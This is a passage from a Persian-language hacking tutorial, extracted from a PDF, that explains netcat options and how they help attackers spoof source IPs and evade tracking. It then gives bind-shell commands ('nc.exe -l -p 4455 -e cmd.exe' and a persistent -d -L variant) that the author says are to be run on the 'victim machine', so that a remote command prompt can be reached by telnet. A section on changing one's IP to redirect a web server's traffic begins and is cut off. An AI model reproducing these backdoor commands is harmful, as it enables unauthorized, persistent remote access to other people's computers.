از‬ ‫ﮔﺰیﻨﻪ ‪ –p‬یﺎ ‪ –u‬ﻣﻴﺒﺎﺷﺪ‪.‬‬ ‫اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬را از هﺮﮔﻮﻧﻪ ﮐﻮﺷﺸﯽ ﺏﻪ ﻣﻨﻈﻮر دﺱﺘﻴﺎﺏﯽ ﺏﻪ ﻧﺎم ﻣﻴﺰﺏﺎن ﻣﻨﻊ ﻣﻴﮑﻨﺪ‪ .‬هﻨﮕﺎﻣﻪ‬ ‫اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ ﻣﺬﮐﻮر اﻃﻤﻴﻨﺎن ﺡﺎﺻﻞ ﮐﻨﻴﺪ ﮐﻪ ﻧﺎم هﻴﭻ ﻣﻴﺰﺏﺎﻧﯽ را ﺏﻪ ﻋﻨﻮان ﺁرﮔﻮﻣﺎن ﺱﻄﺮ ﻓﺮﻣﺎن ﻣﻮرد ﺏﻬﺮﻩ‬ ‫ﺏﺮداری ﻗﺮار ﻧﺪادﻩ ایﺪ‪.‬‬ ‫اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺕﺎ دادﻩ هﺎ ﺏﻪ ﺻﻮرت هﮕﺰادﺱﻴﻤﺎل یﺎ ﻣﺒﻨﺎی ﺷﺎﻧﺰدﻩ در ﻓﺎیﻠﯽ ﺏﺎ ﻣﺸﺨﺼﻪ‬ ‫‪ lehexfi‬ذﺧﻴﺮﻩ ﺷﻮد‪ .‬ﻓﺮﻣﺎن ‪ nc -o hexfile‬هﻢ دادﻩ هﺎی ورودی هﻢ دادﻩ هﺎی ﺧﺮوﺟﯽ را ﺏﻪ ﺻﻮرت‬ ‫هﮕﺰادﺱﻴﻤﺎل ذﺧﻴﺮﻩ ﻣﻴﮑﻨﺪ‪ .‬در ﻓﺎیﻞ ﺡﺎﺻﻞ ﻋﻼﻣﺖ < و > ﺏﻪ ﺕﺮﺕﻴﺐ ﺏﻴﺎﻧﮕﺮ دادﻩ هﺎی ورودی و ﺧﺮوﺟﯽ ﺧﻮاهﻨﺪ‬ ‫ﺏﻮد‪ .‬ﺏﺮای ایﻨﮑﻪ ﻋﻤﻠﻴﺎت ﺡﺎﺻﻞ از ﺏﻪ ﮐﺎر ﮔﻴﺮی ایﻦ ﮔﺰیﻨﻪ ﺕﻨﻬﺎ ﺏﺮ روی دادﻩ ورودی اﻧﺠﺎم ﺷﻮد ﮐﺎﻓﯽ اﺱﺖ‬ ‫ﻓﺮﻣﺎن ﻓﻮق را ﺏﻪ ﺻﻮرت ‪ nc –o < hexfile‬ﺕﻐﻴﻴﺮ دهﻴﺪ‪ .‬ﺏﻪ ﻃﻮر ﻣﺸﺎﺏﻪ ﻓﺮﻣﺎن ‪ nc –o > hexfile‬ﻋﻤﻠﻴﺎت‬ ‫ﻣﻮرد ﻧﻈﺮ را ﺕﻨﻬﺎ ﺏﺮ روی دادﻩ هﺎی ﺧﺮوﺟﯽ اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ایﻦ ﮔﺰیﻨﻪ ﻣﻴﺘﻮان ﺷﻤﺎرﻩ ﭘﻮرت ﻣﺤﻠﯽ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﺏﺮﻧﺎﻣﻪ ‪ NC‬را ﻣﺸﺨﺺ ﻧﻤﻮد‪ .‬ﺏﻪ ﮐﺎرﮔﻴﺮی‬ ‫ایﻦ ﮔﺰیﻨﻪ هﻨﮕﺎم اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ ‪ –l‬یﺎ ‪ –L‬ﺟﻬﺖ ﺕﺤﺼﻴﻞ ﮔﻮش ﺏﻪ زﻧﮓ اﻣﺮی ﺽﺮری اﺱﺖ‪ .‬در ﺻﻮرﺕﯽ ﮐﻪ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫‪١١‬‬

‫‪-r‬‬

‫‪١٢‬‬

‫‪-s‬‬

‫‪١٣‬‬

‫‪-t‬‬

‫‪١۴‬‬

‫‪-u‬‬

‫‪١۵‬‬

‫‪-v‬‬

‫‪١۶‬‬

‫>‪-w<seconds‬‬

‫‪١٧‬‬

‫‪-z‬‬

‫ﺻﻔﺤﻪ‬

‫‪٦٨‬‬

‫از ﮔﺰیﻨﻪ ﻣﻮرد ﺏﺤﺚ اﺱﺘﻔﺎدﻩ ﻧﺸﻮد ‪ NC‬از هﺮ ﭘﻮرﺕﯽ ﮐﻪ ﺱﻴﺴﺘﻢ ﺏﻪ ﺁن اﺧﺘﺼﺎص ﺏﺪهﺪ اﺱﺘﻔﺎدﻩ ﺧﻮاهﺪ ﮐﺮد ) ایﻦ‬ ‫وﺽﻌﻴﺖ ﭼﻴﺰی اﺱﺖ ﮐﻪ در ﻣﻮرد ﺏﻴﺸﺘﺮ ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی ‪ TCP‬یﺎ ‪ UDP‬ﺷﺎهﺪ ﺁن هﺴﺘﻴﻢ ( ‪ .‬ﺏﻪ ﺧﺎﻃﺮ‬ ‫داﺷﺘﻪ ﺏﺎﺷﻴﺪ ﮐﻪ در ﺱﻴﺴﺘﻢ ﻧﻮع یﻮﻧﻴﮑﺲ ﺕﻨﻬﺎ ﮐﺎرﺏﺮ اﺻﻠﯽ ﻣﻮﺱﻮم ﺏﻪ ‪ root‬ﻗﺎدر ﺏﻪ اﺱﺘﻔﺎدﻩ از ﭘﻮرت هﺎی‬ ‫ﮐﻮﭼﮑﺘﺮ از ‪ ١٠٢۴‬اﺱﺖ‪.‬‬ ‫ﺏﺮﻧﺎﻣﻪ ‪ nc‬ﭘﻮرت هﺎی ﻣﺤﻠﯽ و ﭘﻮرت هﺎی راﻩ دور یﺎ ﺏﻪ ﻋﺒﺎرت دیﮕﺮ ﭘﻮرت هﺎی ﻣﺒﺪا و ﻣﻘﺼﺪ را ﺏﻪ ﺻﻮرت‬ ‫ﺕﺼﺎدﻓﯽ اﻧﺘﺨﺎب ﻣﻴﮑﻨﺪ‪ .‬ایﻦ ﻗﺎﺏﻠﻴﺖ در ﻣﻮاﻗﻌﯽ ﻣﻔﻴﺪ واﻗﻊ ﻣﻴﺸﻮد ﮐﻪ ﺏﺨﻮاهﻴﻢ ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺏﺮﻧﺎﻣﻪ اﻃﻼﻋﺎﺕﯽ‬ ‫را درﺏﺎرﻩ ﻣﺤﺪودﻩ ﺏﺰرﮔﯽ از ﭘﻮرت هﺎی ﻣﻮﺟﺪ ﺏﺮ روی ﺱﻴﺴﺘﻢ ﺏﻪ دﺱﺖ ﺁوردﻩ و ﺕﺮﺕﻴﺒﯽ ﻧﺎﻣﺸﺨﺺ از ﭘﻮرت‬ ‫هﺎی ﻣﺒﺪا و ﻣﻘﺼﺪ را ﻣﻮرد ﺏﻬﺮﻩ ﺏﺮداری ﻗﺮار دهﻴﻢ‪ .‬ایﻦ ﻓﻌﺎﻟﻴﺖ ﺏﻪ ﻓﺮایﻨﺪ ﭘﻴﻤﺎیﺶ یﺎ اﺱﮑﻦ ﭘﻮرت هﺎی ﻣﻮﺟﻮد‬ ‫ﺕﻮﺱﻂ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺕﺸﺎﺏﻪ ﮐﻤﯽ داﺷﺘﻪ و ﺏﺪیﻦ ﺕﺮﺕﻴﺐ ﺱﻴﺴﺘﻢ هﺎی ردیﺎﺏﯽ را در ﭘﻴﮕﻴﺮی ﻓﻌﺎﻟﻴﺖ هﺎی ‪ NC‬ﮔﻤﺮاﻩ‬ ‫ﺧﻮاهﺪ ﮐﺮد‪ .‬ﭼﻨﺎن ﭼﻪ از ایﻦ ﮔﺰیﻨﻪ ﺏﻪ هﻤﺮاﻩ ﮔﺰیﻨﻪ ‪ –i‬ﺏﺎ یﮏ ﺕﺎﺧﻴﺮ ﺕﻘﺮیﺒﺎ ﻃﻮﻻﻧﯽ اﺱﺘﻔﺎدﻩ ﺷﻮد ‪ ،‬ان ﮔﺎﻩ ﻓﺮایﻨﺪ‬ ‫اﻧﺘﺨﺎب ﭘﻮرت هﺎ ﺕﺸﺎﺏﻪ ﮐﻤﺘﺮی ﺏﺎ اﺱﮑﻦ ﺁن هﺎ ﺧﻮاهﺪ داﺷﺖ ‪ ،‬ﺏﺎ وﺟﻮد ایﻦ یﮏ ﻣﺪیﺮ ﺱﻴﺴﺘﻢ ﺏﺎهﻮش ﺏﺎ ﮐﻤﯽ دﻗﺖ‬ ‫و ﺡﻮﺻﻠﻪ در وﻗﺎیﻊ ﺙﺒﺖ ﺷﺪﻩ ﺕﻮﺱﻂ ﺱﻴﺴﺘﻢ هﻤﻮارﻩ ﻣﯽ ﺕﻮاﻧﺪ ﺏﻪ ﻣﻮﺽﻮع ﻓﻮق ﭘﯽ ﺏﺒﺮد‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﺁدرس ‪ IP‬ﻣﻨﺒﻌﯽ را ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﺎیﺪ هﻨﮕﺎم ﺏﺮﻗﺮاری ارﺕﺒﺎﻃﺎت ﺧﻮد از ﺁن هﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﺪ ﻣﺸﺨﺺ‬ ‫ﻣﯽ ﻧﻤﺎیﺪ‪ .‬ﮔﺰیﻨﻪ ﻓﻮق ﺏﻪ ﻣﻬﺎﺟﻤﻴﻦ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﺡﻘﻪ هﺎیﯽ را ﺏﻪ دور از ﭼﺸﻤﺎن ﻣﺪیﺮان ﺱﻴﺴﺘﻢ ﺱﻮار ﮐﻨﻨﺪ‪ .‬ﭘﻴﺶ‬ ‫از هﺮ ﭼﻴﺰ ایﻦ ﮔﺰیﻨﻪ اﻣﮑﺎن ﭘﻨﻬﺎن ﮐﺮدن ﺁدرس ‪ IP‬ﻣﻬﺎﺟﻤﻴﻦ یﺎ ﺟﻌﻞ ﺁدرس ‪ IP‬دیﮕﺮان را در اﺧﺘﻴﺎر ﺁﻧﻬﺎ ﻗﺮار‬ ‫ﻣﯽ دهﺪ‪ .‬در ﺻﻮرت ﺟﻌﻞ ﺁدرس ﻣﻬﺎﺟﻢ ﻣﻮرد ﻧﻈﺮ ﺏﺮای دﺱﺖ یﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎت ارﺱﺎﻟﯽ ﺏﻪ ﺁدرس ﻣﻮرد اﺱﺘﻔﺎدﻩ‬ ‫وی ﺏﺎیﺪ از ﮔﺰیﻨﻪ ‪ –g‬ﺟﻬﺖ ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ ﺏﻬﺮﻩ ﺏﮕﻴﺮد‪ .‬ﻧﮑﺘﻪ ﺏﻌﺪی ایﻦ اﺱﺖ ﮐﻪ در ﺏﺴﻴﺎری از ﻣﻮارد در ﺡﺎﻟﺖ‬ ‫ﮔﻮش ﺏﻪ زﻧﮓ ﻣﯽ ﺕﻮان اﻗﺪام ﺏﻪ رﺏﻮدن ﺱﺮویﺲ ﮐﺮد‪ .‬هﻤﺎن ﮔﻮﻧﻪ ﮐﻪ ﻣﻴﺪاﻧﻴﺪ ﺕﻤﺎم ﺱﺮویﺲ هﺎی ‪ TCP‬یﺎ ‪UDP‬‬ ‫از ﻃﺮیﻖ ﭘﻮرت ﻣﺸﺨﺼﯽ ﻗﺎﺏﻞ دﺱﺘﻴﺎﺏﯽ هﺴﺘﻨﺪ‪ .‬ﺏﺮای ﻣﺜﺎل ﺱﺮویﺲ ‪ SYSLOG‬ﺏﺮ روی ﭘﻮرت ‪ UDP‬ﺷﻤﺎرﻩ‬ ‫‪ ۵١۴‬ﺟﻬﺖ دریﺎﻓﺖ دادﻩ هﺎ ﻣﻮرد ﻧﻈﺮ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ اﺱﺖ‪ .‬ﺏﺎ ایﻦ وﺟﺪ در ﺻﻮرت اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﻪ‬ ‫ﻣﻨﻈﻮر ﮔﻮش ﻓﺮا دادن ﺏﻪ ﭘﻮرت ﺷﻤﺎرﻩ ‪ ۵١۴‬و ﻧﻴﺰ ﺏﻬﺮﻩ ﮔﻴﺮی از ﮔﺰیﻨﻪ ‪ –s‬ﺟﻬﺖ ﺕﻌﻴﻴﻦ ﺁدرس ‪ IP‬ﻣﻨﺒﻊ هﺮ‬ ‫ﮔﻮﻧﻪ اﻃﻼﻋﺎت ارﺱﺎﻟﯽ ﺏﻪ ﺁدرس ‪ IP‬ﻣﺬﮐﻮر اﺏﺘﺪا در اﺧﺘﻴﺎر ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﻗﺮار ﺧﻮاهﺪ ﮔﺮﻓﺖ ‪.‬‬ ‫در ﺻﻮرﺕﯽ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ﮔﺰیﻨﻪ ‪ TELNET‬ﮐﺎﻣﭙﺎیﻞ ﺷﺪﻩ ﺏﺎﺷﺪ اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ اﻣﮑﺎن‬ ‫ﻣﻴﺪهﺪ ﺕﺎ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﺎ ﺱﺮور ‪ Telnet‬ﺏﻪ ﮔﻔﺘﮕﻮ ﺏﻨﺸﻴﻨﺪ‪ .‬هﺮﭼﻨﺪ ﻣﻤﮑﻦ اﺱﺖ اﻃﻼﻋﺎت رد ﺏﺪل ﺷﺪﻩ ﺏﻪ اﻧﺪازﻩ‬ ‫ﮐﺎﻓﯽ ﺏﺎ ﻣﻔﻬﻮم ﺏﻪ ﻧﻈﺮ ﻧﺮﺱﺪ اﻣﺎ ﺕﻼش ﺏﺮای اﺕﺼﺎل ﺏﻪ ﭘﻮرت ‪ TCP‬ﺷﻤﺎرﻩ ‪ ٢٣‬ﮐﻪ ﭘﻮرت ﻣﺘﺪاول ﺟﻬﺖ اﺕﺼﺎل‬ ‫ﺏﻪ ﺱﺮور ‪ Telnet‬ﻣﯽ ﺏﺎﺷﺪ ‪ ،‬ﻣﻮﺟﺐ ﺧﻮاهﺪ ﺷﺪ ﺕﺎ اﻋﻼن اﺕﺼﺎل ﺏﻪ ﺏﺮﻧﺎﻣﻪ ‪ Telnet‬ﺏﺮ روی ﺻﻔﺤﻪ ﻇﺎهﺮ ﺷﻮد‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ ‪ NC‬ﺏﻪ ﺟﺎی اﺱﺘﻔﺎدﻩ از ﭘﺮوﺕﮑﻞ ‪ TCP‬از ﭘﺮوﺕﮑﻞ ‪ UDP‬ﺏﻬﺮﻩ ﮔﻴﺮد‪ .‬از ایﻦ ﮔﺰیﻨﻪ‬ ‫ﻣﻴﺘﻮان هﻢ در ﺡﺎﻟﺖ ﮐﻼیﻨﺖ و یﺎ ﺱﺮور ﺏﻬﺮﻩ ﺏﺮد‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﻣﻴﺰان اﻃﻼﻋﺎﺕﯽ را ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﺎیﺪ در ﻓﻌﺎﻟﻴﺖ ﺧﻮد ﺏﻪ ﮐﺎرﺏﺮ ﮔﺰارش ﺏﺪهﺪ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪ .‬ﻋﺪم‬ ‫اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ ‪ NC‬هﻴﭻ اﻃﻼﻋﺎﺕﯽ در ﻣﻮرد روﻧﺪ ﮐﺎر ﺧﻮد در اﺧﺘﻴﺎر ﮐﺎرﺏﺮ ﻗﺮار ﻧﺪهﺪ‪.‬‬ ‫از ﻃﺮف دیﮕﺮ اﺱﺘﻔﺎدﻩ از یﮏ ﮔﺰیﻨﻪ ‪ –v‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ ‪ NC‬در ﺻﻮرت ﺏﺮوز هﺮﮔﻮﻧﻪ ﻣﺸﮑﻠﯽ‬ ‫اﻃﻼﻋﺎﺕﯽ را در ﻣﻮرد ﺁدرﺱﯽ ﮐﻪ ﻗﺼﺪ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ان را دارد در اﺧﺘﻴﺎر ﺏﮕﺬارد‪ .‬هﻤﭽﻨﻴﻦ ﺏﻬﺮﻩ ﮔﻴﺮی از‬ ‫دو ﮔﺰیﻨﻪ ‪ –v‬ﻣﺘﻮاﻟﯽ ﺏﺎﻋﺚ ﺧﻮاهﺪ ﺷﺪ ﺕﺎ ‪ NC‬ﮐﺎرﺏﺮ ﺧﻮد را در ﺟﺮیﺎن ﻣﻴﺰان اﻃﻼﻋﺎت ارﺱﺎﻟﯽ یﺎ دریﺎﻓﺘﯽ ﻗﺮار‬ ‫دهﺪ‪.‬‬ ‫ایﻦ ﮔﺰیﻨﻪ ﻣﺪت زﻣﺎن را ﺏﺮ ﺡﺴﺐ ﺙﺎﻧﻴﻪ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﺏﺎیﺪ ﭘﻴﺶ از ﺻﺮﻓﻨﻈﺮ از اﺕﺼﺎل ‪ ،‬ﺏﺮای‬ ‫ﺏﺮﻗﺮاری ﺁن ﻣﻨﺘﻈﺮ ﺏﻤﺎﻧﺪ‪ .‬ﮔﺰیﻨﻪ ﻣﺬﮐﻮر هﻢ ﭼﻨﻴﻦ ﻣﺪت زﻣﺎﻧﯽ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ NC‬ﭘﺲ از ﻣﻮاﺟﻪ ﺏﺎ‬ ‫ﺷﺎﺧﺺ ‪) EOF‬ﺷﺎﺧﺺ ﭘﺎیﺎن ﻓﺎیﻞ یﺎ ‪ ( End-Of-File‬ﺡﻴﻦ دریﺎﻓﺖ اﻃﻼﻋﺎت از ورودی اﺱﺘﺎﻧﺪارد ‪ ،‬ﭘﻴﺶ از‬ ‫ﺏﺴﺘﻦ اﺕﺼﺎل ﺏﺎیﺪ ﻣﻨﺘﻈﺮ ﺏﻤﺎﻧﺪ‪ .‬ایﻦ رﻓﺘﺎر در ﻣﻮاردی از اهﻤﻴﺖ ﺧﺎص ﺏﺮﺧﻮردار اﺱﺖ ﮐﻪ ﻗﺼﺪﻣﺎن ارﺱﺎل‬ ‫ﻓﺮﻣﺎن ﻣﻮرد ﻧﻈﺮ از ﻃﺮیﻖ ‪ NC‬ﺏﻪ یﮏ ﺱﺮور راﻩ دور ﺏﻮدﻩ و اﻧﺘﻈﺎر دریﺎﻓﺖ ﺡﺠﻢ ﺏﺰرﮔﯽ از اﻃﻼﻋﺎت را‬ ‫داﺷﺘﻪ ﺏﺎﺷﻴﻢ ) ﻣﺎﻧﻨﺪ ارﺱﺎل یﮏ ﻓﺮﻣﺎن ‪ HTTP‬ﺏﻪ وب ﺱﺮور ﺟﻬﺖ ﺏﺎرﮔﻴﺮی یﮏ ﻓﺎیﻞ ﺡﺠﻴﻢ (‬ ‫در ﺻﻮرﺕﯽ ﮐﻪ ﻗﺼﺪﻣﺎن ﺕﻨﻬﺎ اﻃﻼع از ﭘﻮرت هﺎی ﺏﺎز ﺏﺎﺷﺪ ‪ ،‬ﺏﻪ اﺡﺘﻤﺎل ﻗﻮی ﺏﻬﺮﻩ ﮔﻴﺮی از اﺏﺰار ‪nmap‬‬ ‫ﮐﻔﺎیﺖ ﻣﻴﮑﻨﺪ‪ .‬اﻣﺎ ﮔﺰیﻨﻪ ‪ –z‬ﺏﺮﻧﺎﻣﻪ ‪ NC‬را وادار ﻣﯽ ﮐﻨﺪ ﺕﺎ ﺕﻨﻬﺎ اﻃﻼﻋﺎﺕﯽ را در ﺡﺪ ﮐﻔﺎیﺖ راﺟﻪ ﺏﻪ ﭘﻮرت هﺎیﯽ‬ ‫ﮐﻪ از ﻣﺠﻤﻮﻋﻪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺨﺘﻠﻒ از ﻃﺮیﻖ ﺁﻧﻬﺎ در ﺡﺎﻟﺖ ﮔﻮش ﺏﻪ زﻧﮓ ﺏﻪ ﺱﺮ ﻣﻴﺒﺮﻧﺪ ‪ ،‬در اﺧﺘﻴﺎر ﻗﺮار‬ ‫دهﺪ‪.‬‬

‫دیﮕﻪ اﺱﺘﻔﺎدﻩ و ﺷﻴﻮﻩ ﺕﺮﮐﻴﺐ ﺏﻨﺪی ﺏﺎ ﺧﻮدﺕﺎن ‪ ،‬ﻣﻦ ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ دادم ﭘﺲ ﺧﻮدﺕﺎن ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻧﻴﺎزﺕﺎن ﺕﺮﮐﻴﺐ هﺎی ﻣﺨﺘﻠﻔﯽ را ﺏﻪ وﺟﺪ ﺁوریﺪ ﻣﺜﻞ‬ ‫ایﻦ ﭼﻨﺪ ﺕﺮﮐﻴﺐ ﻣﺸﻬﻮر ‪:‬‬ ‫‪C :\> nc.exe -l -p 4455 -e cmd.exe‬‬ ‫ایﻦ ﺕﺮﮐﻴﺐ ﻣﺸﻬﻮر را ﺏﺎیﺪ روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ اﺟﺮا ﮐﻨﻴﺪ ﺕﺎ روی ﭘﻮرت ‪ ۴۴۵۵‬ﻣﺎﺷﻴﻦ هﺪف ﺏﺮﻧﺎﻣﻪ ‪ CMD‬یﺎ هﻤﺎن ﺧﻂ ﻓﺮﻣﺎن اﺟﺮا ﺷﻮد و‬ ‫ﺷﻤﺎ ﺏﺎ یﮏ ‪ Telnet‬ﺱﺎدﻩ ﺏﻪ ﭘﻮرت ﺷﻤﺎرﻩ ‪ ۴۴۵۵‬ﺏﻪ ان دﺱﺘﺮﺱﯽ ﭘﻴﺪا ﮐﻨﻴﺪ‪ ) .‬ایﻦ یﮑﯽ ﻓﻘﻂ ﺏﺨﺎﻃﺮ رایﮕﺎن ﺏﻮدن ﻣﻘﺎﻟﻪ ﺏﻪ ﻏﺎیﺖ!! اﮔﺮ ﻗﺒﻞ از‬ ‫ﺱﻮیﭻ ‪ –e‬ﺱﻮیﭻ ‪ –d‬را اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ اﮔﺮ ﭘﻨﺠﺮﻩ ﺧﻂ ﻓﺮﻣﺎن ‪ ،‬ﮐﻪ در ﺁن دﺱﺘﻮر ﺏﺎز ﺷﺪن ﭘﻮرت را ﺻﺎدر ﮐﺮدﻩ ایﺪ ﺏﺴﺘﻪ هﻢ ﺷﻮد ‪ ،‬ﺏﺎز ﭘﻮرت‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٦٩‬‬

‫ﻣﻮرد ﻧﻈﺮ ﺏﺎز ﻣﻴﻤﺎﻧﺪ و ﺏﺮﻧﺎﻣﻪ ﭘﺸﺖ ﺁن ﮔﻮش ﺏﻪ زﻧﮓ ؛ اﮔﺮ ﺏﻪ ﺟﺎی ﮔﺰیﻨﻪ ‪ –l‬از ﮔﺰیﻨﻪ ‪ –L‬اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺏﻌﺪ اﺕﻤﺎم ﮐﺎر ﺷﻤﺎ ﺏﺎ ﺏﺮﻧﺎﻣﻪ ‪ NC‬دیﮕﺮ‬ ‫از ﭘﺸﺖ ﭘﻮرت ﺧﺎرج ﻧﻤﻴﺸﻮد و هﻤﻴﺸﻪ ﺕﺎ راﻩ اﻧﺪازی ﻣﺠﺪد ﺁن ﻣﺎﺷﻴﻦ ﭘﺸﺖ ﺁن ﭘﻮرت ﮔﻮش ﺏﻪ زﻧﮓ ﺏﺮﻧﺎﻣﻪ ‪ CMD‬را ﻧﮕﻪ ﻣﻴﺪارد (‪ .‬ﭘﺲ ﺱﻌﯽ‬ ‫ﮐﻨﻴﺪ ﺡﺘﯽ اﮔﺮ ایﻦ ﺕﻮﺽﻴﺤﺎت را هﻢ ﻣﺘﻮﺟﻪ ﻧﺸﺪیﺪ !! از ﺷﮑﻞ ﻋﻤﻮﻣﯽ ‪ NC‬در ایﻦ ﺏﺎرﻩ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ‪:‬‬ ‫‪C :\> nc.exe –p 4455 –d –L –e cmd.exe‬‬ ‫ﺏﺠﺎی ﻋﺪد ‪ ۴۴۵۵‬هﻢ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ از ﭘﻮرت هﺎی ﺷﻤﺎرﻩ ﺏﺎﻻ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ و ﻧﻴﺰ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ ﺟﺎی ﺧﻂ ﻓﺮﻣﺎن هﺮ ﭼﻴﺰ دیﮕﺮی را اﺟﺮا ﮐﻨﻴﺪ !!‬ ‫ایﻦ یﮏ ﺏﺎر دیﮕﺮ ﺏﮕﻢ ایﻦ ﻓﺮﻣﺎن ﺏﺎﻻ را ﺏﺎیﺪ روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ اﺟﺮا ﮐﻨﻴﺪ ﻧﻪ روی ﻣﺎﺷﻴﻦ ﺧﻮدﺕﺎن ‪.‬‬ ‫زﻧﮓ ﺕﻔﺮیﺢ‪:‬‬ ‫ﭼﮕﻮﻧﻪ ‪ IP‬ﺧﻮد را ﻋﻮض ﮐﻨﻴﻢ؟‬ ‫در ایﻦ ﻣﻘﺎﻟﻪ ﺁﻣﻮزش ﻣﯽ دیﻢ ﭼﻪ ﺟﻮری ‪IP‬ﺧﻮدﺕﻮن را ﺏﺎ یﻪ ‪ IP‬دیﮕﻪ از هﻤﻮن ‪Range‬ﻋﻮض ﮐﻨﻴﻦ ‪.‬هﺮ ﻣﻮﻗﻊ ﮐﻪ ﺏﻪ ایﻨﺘﺮﻧﺖ وﺻﻞ ﻣﻲ ﺷﻮیﺪ‪ ،‬ﭘﺮوﺕﮑﻞ ‪ DHCP‬ﺏﻪ ﺷﻤﺎ یﮏ ‪ IP‬ﺕﺨﺼﻴﺺ‬ ‫ﻣﻴﺪهﺪ ‪.‬ﻋﻮض ﮐﺮدن ایﻦ ‪ IP‬ﮐﺎر ﭼﻨﺪان ﺱﺨﺘﻲ ﻧﻴﺴﺖ و اﻟﺒﺘﻪ ﻣﻴﺘﻮﻧﻪ ﻣﻔﻴﺪ هﻢ ﺏﺎﺷﻪ ! ﻣﺜﻼ ﻣﻮﻗﻌﻲ ﮐﻪ ﺷﻤﺎ ﺕﺤﺖ ﺡﻤﻠﻪ ‪ DDoS‬هﺴﺘﻴﻦ !! یﺎ وﻗﺘﻲ ﮐﻪ ﻣﻴﺨﻮاهﻴﻦ ﺕﻤﺎﻣﻲ درﺧﻮاﺱﺘﻬﺎ ﺏﻪ یﻪ وب ﺱﺮور‬ ‫رو ﺏﻪ ﻃﺮف ﺧﻮدﺕﻮن ‪ Redirect‬ﮐﻨﻴﻦ ) ایﻦ ﺏﻪ درد ﻣﺎ ﻣﻴﺨﻮرد ! ( یﺎ ﻓﺮﺽًﺎ وﻗﺘﻲ ﮐﻪ ‪ IP‬ﺷﻤﺎ ﺏﺴﺘﻪ ﺷﺪﻩ و ﻣﻴﺨﻮایﻦ ﺏﻪ ﺟﺎي اون از یﻪ ‪IP‬دیﮕﻪ در ‪Range‬ﺧﻮدﺕﻮن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻦ و یﺎ ‪...‬ﺏﻪ‬ ‫ﺕﻐﻴﻴﺮ دادن ‪ IP‬اﺡﺘﻴﺎج ﭘﻴﺪا ﻣﻴﮑﻨﻴﻦ !‬ ‫اﻃﻼﻋﺎت ﻣﻮرد ﻧﻴﺎز ‪:‬‬ ‫ﻗﺒﻞ از ایﻨﮑﻪ ﺷﻤﺎ ﺏﺘﻮاﻧﻴﺪ ‪ IP‬ﺧﻮدﺕﻮن رو ﻋﻮض ﮐﻨﻴﻦ‪ ،‬ﺏﺎیﺪ یﻪ ﺱﺮي اﻃﻼﻋﺎت ﺟﻤﻊ ﮐﻨﻴﻦ ‪.‬ایﻦ اﻃﻼﻋﺎت ﻋﺒﺎرﺕﻨﺪ از ‪ :‬ﻣﺤﺪودﻩ ‪ IP‬ﺷﻤﺎ ‪ ، Subnet Mask ،‬ﻣﺪﺧﻞ )‪ (Gateway‬ﭘﻴﺶ ﮔﺰیﺪﻩ ‪،‬‬ ‫ﺱﺮور ‪ DHCP‬و ﺱﺮورهﺎي ‪. DNS‬‬ ‫ﻼ ﺱﺨﺖ 